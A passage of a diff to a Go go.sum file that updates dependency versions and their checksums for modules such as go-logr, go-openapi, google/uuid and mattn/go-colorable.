h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= github.com/elastic/go-licenser v0.3.1/go.mod h1:D8eNQk70FOCVBl3smCGQt/lv7meBeQno2eI1S5apiHQ= github.com/elastic/go-licenser v0.4.0 h1:jLq6A5SilDS/Iz1ABRkO6BHy91B9jBora8FwGRsDqUI= github.com/elastic/go-licenser v0.4.0/go.mod h1:V56wHMpmdURfibNBggaSBfqgPxyT1Tldns1i87iTEvU= @@ -368,12 +378,16 @@ github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1m github.com/envoyproxy/go-control-plane v0.9.7/go.mod h1:cwu0lG7PUMfa9snN8LXBig5ynNVH9qI8YYLbd1fK2po= github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/evanphx/json-patch v4.9.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/evanphx/json-patch v4.11.0+incompatible h1:glyUF9yIYtMHzn8xaKw5rMhdWcwsYV8dZHIq5567/xs= github.com/evanphx/json-patch v4.11.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/exponent-io/jsonpath v0.0.0-20151013193312-d6023ce2651d h1:105gxyaGwCFad8crR9dcMQWvV9Hvulu6hwUh4tWPJnM= +github.com/evanphx/json-patch v4.12.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= +github.com/evanphx/json-patch v5.6.0+incompatible h1:jBYDEEiFBPxA0v50tFdvOzQQTCvpL6mnFh5mB2/l16U= +github.com/evanphx/json-patch v5.6.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= github.com/exponent-io/jsonpath v0.0.0-20151013193312-d6023ce2651d/go.mod h1:ZZMPRZwes7CROmyNKgQzC3XPs6L/G2EJLHddWejkmf4= +github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f h1:Wl78ApPPB2Wvf/TIe2xdyJxTlb6obmF18d8QdkxNDu4= +github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f/go.mod h1:OSYXu++VVOHnXeitef/D8n/6y4QV8uLHSFXX4NeXMGc= github.com/fatih/camelcase v1.0.0/go.mod h1:yN2Sb0lFhZJUdVvtELVWefmrXpuZESvPmqwoZc+/fpc= github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= @@ -389,13 +403,15 @@ github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4 github.com/fullsailor/pkcs7 v0.0.0-20190404230743-d7302db945fa/go.mod h1:KnogPXtdwXqoenmZCw6S+25EAm2MkxbG0deNDu4cbSA= github.com/fvbommel/sortorder v1.0.1/go.mod h1:uk88iVf1ovNn1iLfgUVU2F9o5eO30ui720w+kxuqRs0= github.com/garyburd/redigo v0.0.0-20150301180006-535138d7bcd7/go.mod h1:NR3MbYisc3/PwhQ00EMzDiPmrwpPxAn5GI05/YaO1SY= +github.com/getkin/kin-openapi v0.76.0/go.mod h1:660oXbgy5JFMKreazJaQTw7o+X00qeSyhcnluiMv+Xg= github.com/getsentry/raven-go v0.2.0/go.mod h1:KungGk8q33+aIAZUIVWZDr2OfAEBsO49PX4NzFV5kcQ= github.com/ghodss/yaml v0.0.0-20150909031657-73d445a93680/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/gliderlabs/ssh v0.2.2 h1:6zsha5zo/TWhRhwqCD3+EarCAgZ2yN28ipRnGPnwkI0= github.com/gliderlabs/ssh v0.2.2/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0= -github.com/go-errors/errors v1.0.1 h1:LUHzmkK3GUKUrL/1gfBUxAHzcev3apQlezX/+O7ma6w= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= +github.com/go-errors/errors v1.4.1 h1:IvVlgbzSsaUNudsw5dcXSzF3EWyXTi5XrAdngnuhRyg= +github.com/go-errors/errors v1.4.1/go.mod h1:sIVyrIiJhuEF+Pj9Ebtd6P/rEYROXFi3BopGUQ5a5Og= github.com/go-git/gcfg v1.5.0 h1:Q5ViNfGF8zFgyJWPqYwA7qGFoMTEiBmdlkcfRmpIMa4= github.com/go-git/gcfg v1.5.0/go.mod h1:5m20vg6GwYabIxaOonVkTdrILxQMpEShl1xiMF4ua+E= github.com/go-git/go-billy/v5 v5.2.0/go.mod h1:pmpqyWchKfYfrkb/UVH4otLvyi/5gJlGI4Hb3ZqZ3W0= @@ -417,28 +433,36 @@ github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V github.com/go-logfmt/logfmt v0.5.0/go.mod h1:wCYkCAKZfumFQihp8CzCvQ3paCTfi41vtzG1KdI/P7A= github.com/go-logr/logr v0.1.0/go.mod h1:ixOQHD9gLJUVQQ2ZOR7zLEifBX6tGkNJF4QyIY7sIas= github.com/go-logr/logr v0.2.0/go.mod h1:z6/tIYblkpsD+a4lm/fGIIU9mZ+XfAiaFtq7xTgseGU= -github.com/go-logr/logr v0.4.0 h1:K7/B1jt6fIBQVd4Owv2MqGQClcgf0R266+7C/QjRcLc= github.com/go-logr/logr v0.4.0/go.mod h1:z6/tIYblkpsD+a4lm/fGIIU9mZ+XfAiaFtq7xTgseGU= -github.com/go-openapi/errors v0.19.8 h1:doM+tQdZbUm9gydV9yR+iQNmztbjj7I3sW4sIcAwIzc= +github.com/go-logr/logr v1.2.0/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= +github.com/go-logr/logr v1.2.2 h1:ahHml/yUpnlb96Rp8HCvtYVPY8ZYpxq3g7UYchIYwbs= +github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= +github.com/go-logr/zapr v1.2.0/go.mod h1:Qa4Bsj2Vb+FAVeAKsLD8RLQ+YRJB8YDmOAKxaBQf7Ro= github.com/go-openapi/errors v0.19.8/go.mod h1:cM//ZKUKyO06HSwqAelJ5NsEMMcpa6VpXe8DOa1Mi1M= +github.com/go-openapi/errors v0.20.1 h1:j23mMDtRxMwIobkpId7sWh7Ddcx4ivaoqUbfXx5P+a8= +github.com/go-openapi/errors v0.20.1/go.mod h1:cM//ZKUKyO06HSwqAelJ5NsEMMcpa6VpXe8DOa1Mi1M= github.com/go-openapi/jsonpointer v0.19.2/go.mod h1:3akKfEdA7DF1sugOqz1dVQHBcuDBPKZGEoHC/NkiQRg= github.com/go-openapi/jsonpointer v0.19.3/go.mod h1:Pl9vOtqEWErmShwVjC8pYs9cog34VGT37dQOVbmoatg= github.com/go-openapi/jsonpointer v0.19.5 h1:gZr+CIYByUqjcgeLXnQu2gHYQC9o73G2XUeOFYEICuY= github.com/go-openapi/jsonpointer v0.19.5/go.mod h1:Pl9vOtqEWErmShwVjC8pYs9cog34VGT37dQOVbmoatg= github.com/go-openapi/jsonreference v0.19.2/go.mod h1:jMjeRr2HHw6nAVajTXJ4eiUwohSTlpa0o73RUL1owJc= github.com/go-openapi/jsonreference v0.19.3/go.mod h1:rjx6GuL8TTa9VaixXglHmQmIL98+wF9xc8zWvFonSJ8= -github.com/go-openapi/jsonreference v0.19.5 h1:1WJP/wi4OjB4iV8KVbH73rQaoialJrqv8gitZLxGLtM= github.com/go-openapi/jsonreference v0.19.5/go.mod h1:RdybgQwPxbL4UEjuAruzK1x3nE69AqPYEJeo/TWfEeg= +github.com/go-openapi/jsonreference v0.19.6 h1:UBIxjkht+AWIgYzCDSv2GN+E/togfwXUJFRTWhl2Jjs= +github.com/go-openapi/jsonreference v0.19.6/go.mod h1:diGHMEHg2IqXZGKxqyvWdfWU/aim5Dprw5bqpKkTvns= github.com/go-openapi/spec v0.19.3/go.mod h1:FpwSN1ksY1eteniUU7X0N/BgJ7a4WvBFVA8Lj9mJglo= -github.com/go-openapi/strfmt v0.21.0 h1:hX2qEZKmYks+t0hKeb4VTJpUm2UYsdL3+DCid5swxIs= github.com/go-openapi/strfmt v0.21.0/go.mod h1:ZRQ409bWMj+SOgXofQAGTIo2Ebu72Gs+WaRADcS5iNg= +github.com/go-openapi/strfmt v0.21.1 h1:G6s2t5V5kGCHLVbSdZ/6lI8Wm4OzoPFkc3/cjAsKQrM= +github.com/go-openapi/strfmt v0.21.1/go.mod h1:I/XVKeLc5+MM5oPNN7P6urMOpuLXEcNrCX/rPGuWb0k= github.com/go-openapi/swag v0.19.2/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk= github.com/go-openapi/swag v0.19.5/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk= -github.com/go-openapi/swag v0.19.14 h1:gm3vOOXfiuw5i9p5N9xJvfjvuofpyvLA9Wr6QfK5Fng= github.com/go-openapi/swag v0.19.14/go.mod h1:QYRuS/SOXUCsnplDa677K7+DxSOj6IPNl/eQntq43wQ= +github.com/go-openapi/swag v0.19.15 h1:D2NRCBzS9/pEY3gP9Nl8aDqGUcPFrwG2p+CNFrLyrCM= +github.com/go-openapi/swag v0.19.15/go.mod h1:QYRuS/SOXUCsnplDa677K7+DxSOj6IPNl/eQntq43wQ= github.com/go-sql-driver/mysql v1.5.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg= -github.com/go-stack/stack v1.8.0 h1:5SgMzNM5HxrEjV0ww2lTmX6E2Izsfxas4+YHWRs3Lsk= github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY= +github.com/go-stack/stack v1.8.1 h1:ntEHSVwIt7PNXNpgPmVfMrNhLtgjlmnZha2kOpuRiDw= +github.com/go-stack/stack v1.8.1/go.mod h1:dcoOX6HbPZSZptuspn9bctJ+N/CnF5gGygcUP3XYfe4= github.com/gobuffalo/attrs v0.0.0-20190224210810-a9411de4debd/go.mod h1:4duuawTqi2wkkpB4ePgWMaai6/Kc6WEz83bhFwpHzj0= github.com/gobuffalo/depgen v0.0.0-20190329151759-d478694a28d3/go.mod h1:3STtPUQYuzV0gBVOY3vy6CfMm/ljR4pABfrTeHNLHUY= github.com/gobuffalo/depgen v0.1.0/go.mod h1:+ifsuy7fhi15RWncXQQKjWS9JPkdah5sZvtHc2RXGlg= @@ -473,7 +497,7 @@ github.com/godbus/dbus v0.0.0-20190422162347-ade71ed3457e/go.mod h1:bBOAhwG1umN6 github.com/godbus/dbus/v5 v5.0.3/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= github.com/godror/godror v0.24.2/go.mod h1:wZv/9vPiUib6tkoDl+AZ/QLf5YZgMravZ7jxH2eQWAE= -github.com/gofrs/flock v0.8.0/go.mod h1:F1TvTiK9OcQqauNUHlbJvyl9Qa1QvF/gOUDKA14jxHU= +github.com/gofrs/flock v0.8.1/go.mod h1:F1TvTiK9OcQqauNUHlbJvyl9Qa1QvF/gOUDKA14jxHU= github.com/gogo/googleapis v1.2.0/go.mod h1:Njal3psf3qN6dwBtQfUmBZh2ybovJ0tlu3o/AC7HYjU= github.com/gogo/googleapis v1.4.0/go.mod h1:5YRNX2z1oM5gXdAkurHa942MDgEJyk02w4OecKY87+c= github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= @@ -485,6 +509,7 @@ github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q= github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/glog v1.0.0/go.mod h1:EWib/APOK0SL3dFbYqvxE3UYd8E6s1ouQ7iEp/0LWV4= github.com/golang/groupcache v0.0.0-20160516000752-02826c3e7903/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/groupcache v0.0.0-20190129154638-5b532d6fd5ef/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= @@ -518,14 +543,17 @@ github.com/golang/protobuf v1.5.1/go.mod h1:DopwsBzvsk0Fs44TXzsVbJyPhcCPeIwnvohx github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw= github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= -github.com/golang/snappy v0.0.2 h1:aeE13tS0IiQgFjYdoL8qN3K1N2bXXtI6Vi51/y7BpMw= github.com/golang/snappy v0.0.2/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= +github.com/golang/snappy v0.0.4 h1:yAGX7huGHXlcLOEtBnF4w7FQwA26wojNCwOYAEhLjQM= +github.com/golang/snappy v0.0.4/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/golangplus/testing v0.0.0-20180327235837-af21d9c3145e/go.mod h1:0AA//k/eakGydO4jKRoRL2j92ZKSzTgj9tclaCrvXHk= github.com/gomodule/redigo v1.8.2/go.mod h1:P9dn9mFrCBvWhGE1wpxx6fgq7BAeLBk+UUUzlpkBYO0= github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= github.com/google/btree v1.0.1 h1:gK4Kx5IaGY9CD5sPJ36FHiBJ6ZXl0kilRiiCj+jdYp4= github.com/google/btree v1.0.1/go.mod h1:xXMiIv4Fb/0kKde4SpL7qlzvu5cMJDRkFDxJfI9uaxA= +github.com/google/cel-go v0.9.0/go.mod h1:U7ayypeSkw23szu4GaQTPJGx66c20mx8JklMSxrmI1w= +github.com/google/cel-spec v0.6.0/go.mod h1:Nwjgxy5CbjlPrtCWjeDjUyKMl8w41YBYGjsyDdqk0xA= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= @@ -536,16 +564,18 @@ github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/ github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.6 h1:BKbKCqvP6I+rmFHt06ZmyQtvB8xAkWdhFyr0ZUNZcxQ= +github.com/google/go-cmp v0.5.6/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-github/v32 v32.1.0 h1:GWkQOdXqviCPx7Q7Fj+KyPoGm4SwHRh8rheoPhd27II= github.com/google/go-github/v32 v32.1.0/go.mod h1:rIEpZD9CTDQwDK9GDrtMTycQNA4JU3qBsCizh3q2WCI= github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/go-querystring v1.1.0 h1:AnCroh3fv4ZBgVIf1Iwtovgjaw/GiKJo8M8yD/fhyJ8= github.com/google/go-querystring v1.1.0/go.mod h1:Kcdr2DB4koayq7X8pmAG4sNG59So17icRSOU623lUBU= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= -github.com/google/gofuzz v1.1.0 h1:Hsa8mG0dQ46ij8Sl2AYJDUv1oA9/d6Vk+3LG99Oe02g= github.com/google/gofuzz v1.1.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= +github.com/google/gofuzz v1.2.0 h1:xRy4A+RhZaiKjJ1bPfwQ8sedCA+YS2YcCHW6ec7JMi0= +github.com/google/gofuzz v1.2.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs= github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= github.com/google/martian/v3 v3.1.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= @@ -566,8 +596,9 @@ github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3 github.com/google/uuid v1.0.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs= github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I= +github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gnostic v0.4.1/go.mod h1:LRhVm6pbyptWbWbuZ38d1eyptfvIytN3ir6b65WBswg= @@ -587,8 +618,9 @@ github.com/gorilla/websocket v0.0.0-20170926233335-4201258b820c/go.mod h1:E7qHFY github.com/gorilla/websocket v1.4.0/go.mod h1:E7qHFY5m1UJ88s3WnNqhKjPHQ0heANvMoAMk2YaljkQ= github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE= github.com/gosuri/uitable v0.0.4/go.mod h1:tKR86bXuXPZazfOTG1FIzvjIdXzd0mo4Vtn16vt0PJo= -github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7 h1:pdN6V1QBWetyv/0+wjACpqVH+eVULgEjkurDLq3goeM= github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7/go.mod h1:FecbI9+v66THATjSRHfNgh1IVFe/9kFxbXtjV0ctIMA= +github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79 h1:+ngKgrYPPJrOjhax5N+uePQ0Fh1Z7PheYoUI/0nzkPA= +github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79/go.mod h1:FecbI9+v66THATjSRHfNgh1IVFe/9kFxbXtjV0ctIMA= github.com/grpc-ecosystem/go-grpc-middleware v1.0.0/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs= github.com/grpc-ecosystem/go-grpc-middleware v1.0.1-0.20190118093823-f849b5445de4/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs= github.com/grpc-ecosystem/go-grpc-middleware v1.3.0/go.mod h1:z0ButlSOZa5vEBq9m2m2hlwIgKw+rp3sdCBRoJY+30Y= @@ -658,8 +690,9 @@ github.com/jpillora/backoff v1.0.0/go.mod h1:J/6gKK9jxlEcS3zixgDgUAsiuZ7yrSoa/FX github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU= github.com/json-iterator/go v1.1.7/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= -github.com/json-iterator/go v1.1.11 h1:uVUAXhF2To8cbw/3xN3pxj6kk7TYKs98NIrTqPlMWAQ= github.com/json-iterator/go v1.1.11/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= +github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM= +github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo= github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU= github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/XSXhF0NWZEnDohbsk= github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= @@ -670,8 +703,9 @@ github.com/karrick/godirwalk v1.10.3/go.mod h1:RoGL9dQei4vP9ilrpETWE8CLOZ1kiN0Lh github.com/karrick/godirwalk v1.15.8/go.mod h1:j4mkqPuvaLI8mp1DroR3P6ad7cyYd4c1qeJ3RV7ULlk= github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs= github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8= -github.com/kevinburke/ssh_config v0.0.0-20201106050909-4977a11b4351 h1:DowS9hvgyYSX4TO5NpyC606/Z4SxnNYbT+WX27or6Ck= github.com/kevinburke/ssh_config v0.0.0-20201106050909-4977a11b4351/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM= +github.com/kevinburke/ssh_config v1.1.0 h1:pH/t1WS9NzT8go394IqZeJTMHVm6Cr6ZJ6AQ+mdNo/o= +github.com/kevinburke/ssh_config v1.1.0/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM= github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= @@ -720,8 +754,9 @@ github.com/magiconair/properties v1.8.5/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPK github.com/mailru/easyjson v0.0.0-20190614124828-94de47d64c63/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc= github.com/mailru/easyjson v0.0.0-20190626092158-b2ccc519800e/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc= github.com/mailru/easyjson v0.7.0/go.mod h1:KAzv3t3aY1NaHWoQz1+4F1ccyAH66Jk7yos7ldAVICs= -github.com/mailru/easyjson v0.7.6 h1:8yTIVnZgCoiM1TgqoeTl+LfU5Jg6/xL3QhGQnimLYnA= github.com/mailru/easyjson v0.7.6/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc= +github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0= +github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc= github.com/markbates/errx v1.1.0/go.mod h1:PLa46Oex9KNbVDZhKel8v1OT7hD5JZ2eI7AHhA0wswc= github.com/markbates/oncer v0.0.0-20181203154359-bf2de49a0be2/go.mod h1:Ld9puTsIW75CHf65OeIOkyKbteujpZVXDpWK6YGZbxE= github.com/markbates/oncer v1.0.0/go.mod h1:Z59JA581E9GP6w96jai+TGqafHPW+cPfRxz2aSZ0mcI= @@ -731,8 +766,9 @@ github.com/matryer/is v1.2.0 h1:92UTHpy8CDwaJ08GqLDzhhuixiBUUD1p3AU6PHddz4A= github.com/matryer/is v1.2.0/go.mod h1:2fLPjFQM9rhQ15aVEtbuwhJinnOqrmgXPNdZsdwlWXA= github.com/mattn/go-colorable v0.0.9/go.mod h1:9vuHe8Xs5qXnSaW/c/ABM9alt+Vo+STaOChaDxuIBZU= github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= -github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U= github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40= +github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4= github.com/mattn/go-isatty v0.0.3/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4= github.com/mattn/go-isatty v0.0.4/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4= github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= @@ -742,8 +778,9 @@ github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27k github.com/mattn/go-oci8 v0.1.1/go.mod h1:wjDx6Xm9q7dFtHJvIlrI99JytznLw5wQ4R+9mNXJwGI= github.com/mattn/go-runewidth v0.0.2/go.mod h1:LwmH8dsx7+W8Uxz3IHJYH5QSwggIsqBzpuz5H//U1FU= github.com/mattn/go-runewidth v0.0.7/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= -github.com/mattn/go-runewidth v0.0.9 h1:Lm995f3rfxdpd6TSmuVCHVb/QhupuXlYr8sCI/QdE+0= github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= +github.com/mattn/go-runewidth v0.0.13 